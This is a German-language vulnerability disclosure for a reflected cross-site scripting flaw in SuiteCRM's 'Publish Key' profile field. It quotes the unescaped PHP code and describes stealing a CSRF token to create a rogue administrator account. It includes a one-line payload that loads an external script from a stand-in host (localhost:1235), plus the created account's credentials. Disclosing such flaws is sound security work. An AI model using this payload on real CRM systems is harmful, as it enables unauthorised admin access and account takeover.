
Eine Sicherheitslücke in SuiteCRM, die ausgenutzt werden kann, um CSRF-Token zu stehlen und nicht autorisierte Aktionen durchzuführen, wie z. B. das Erstellen neuer Administratorenbenutzer ohne ordnungsgemäße Authentifizierung.
Das „Publish Key“-Feld auf der Seite „Profil bearbeiten“ in SuiteCRM ist anfällig für Reflektiertes Cross-Site Scripting (XSS), wodurch ein Angreifer schädlichen JavaScript-Code einschleusen kann. Dies kann ausgenutzt werden, um CSRF-Token zu stehlen und unbefugte Aktionen durchzuführen, wie etwa das Erstellen neuer administrativer Benutzer ohne ordnungsgemäße Authentifizierung.
Die Schwachstelle entsteht durch unzureichende Eingabevalidierung und -bereinigung des Publish Key-Feldes in der SuiteCRM-Anwendung. Wenn ein Angreifer ein bösartiges Skript einschleust, wird es im Kontext der Sitzung eines authentifizierten Benutzers ausgeführt. Das injizierte Skript (o.js) nutzt dann das erbeutete CSRF-Token, um Anfragen zu fälschen, die neue administrative Benutzer erstellen, wodurch die Integrität und Sicherheit der CRM-Instanz beeinträchtigt wird.
Diese Schwachstelle ist ein kritisches Cross-Site Scripting (XSS)-Problem. Ihre Auswirkungen umfassen:
$publish_key = $this->bean->getPreference('calendar_publish_key');
$this->ss->assign('CALENDAR_PUBLISH_KEY', $publish_key);
$publish_url = $sugar_config['site_url'] . '/vcal_server.php';
$token = "/";
$publish_url .= $token . "type=vfb&source=outlook&key=<span id=\"cal_pub_key_span\">$publish_key</span>";
$ical_url = $sugar_config['site_url'] . "/ical_server.php?type=ics&key=<span id=\"ical_pub_key_span\">$publish_key</span>";
$this->ss->assign("CALENDAR_PUBLISH_URL", $publish_url);
$this->ss->assign("CALENDAR_ICAL_URL", $ical_url);
<script src=//localhost:1235/o.js>
Username - imposter
Password - ok
https://github.com/user-attachments/assets/cdf96f3d-7f61-4371-818b-e344efdcd197